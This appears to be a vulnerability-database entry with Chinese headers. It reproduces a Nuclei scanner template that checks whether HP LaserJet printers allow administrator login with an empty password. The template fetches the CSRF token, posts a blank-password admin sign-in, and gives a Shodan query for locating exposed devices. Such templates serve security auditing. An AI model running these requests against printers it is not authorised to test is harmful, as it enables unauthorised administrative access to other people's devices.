hp-printer-default-login: Hewlett Packard LaserJet Printer - Default Login

日期: 2025-08-01 | 影响软件: Hewlett Packard LaserJet Printer | POC: 已公开

漏洞描述

HP printers often allow administrative access without requiring a password by default. This behavior enables anyone to log in as the Administrator without authentication, potentially exposing sensitive settings or functions.

PoC代码[已公开]

id: hp-printer-default-login

info:
  name: Hewlett Packard LaserJet Printer - Default Login
  author: JohnAsbjorn
  severity: high
  description: |
    HP printers often allow administrative access without requiring a password by default. This behavior enables anyone to log in as the Administrator without authentication, potentially exposing sensitive settings or functions.
  reference:
    - https://h30434.www3.hp.com/t5/Printing-Errors-or-Lights-Stuck-Print-Jobs/What-is-the-user-name-and-password-in-Embedded-Web-Server/td-p/6165417
  metadata:
    verified: true
    shodan-query: html:"hp/device/SignIn/Index"
    max-request: 2
  tags: hp,printer,default-login,vuln

http:
  - raw:
      - |
        GET /hp/device/SignIn/Index HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: identity
        Accept-Language: en

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'id="CSRFToken" name="CSRFToken" value="([^"]+)"'
        internal: true

  - raw:
      - |
        POST /hp/device/SignIn/Index HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: identity
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}
        Referer: {{RootURL}}/hp/device/SignIn/Index

        CSRFToken={{token}}&agentIdSelect=hp_EmbeddedPin_v1&PinDropDown=AdminItem&PasswordTextBox=&signInOk=Sign+In

    redirects: true
    max-redirects: 2

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "User: Administrator"
          - "Sign out"
        condition: and

      - type: regex
        part: header
        regex:
          - 'Set-Cookie: .*session.*'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e61bf1e629c1bd1c979fb1c0b8400f71d4ba803c8f05ea9a2802c388fdbeb59802201bfbb54af92230a44983d488b9af674195538fcefd65c02e71781a98ad2ae4b1:922c64590222798bb761d5b6d8e72950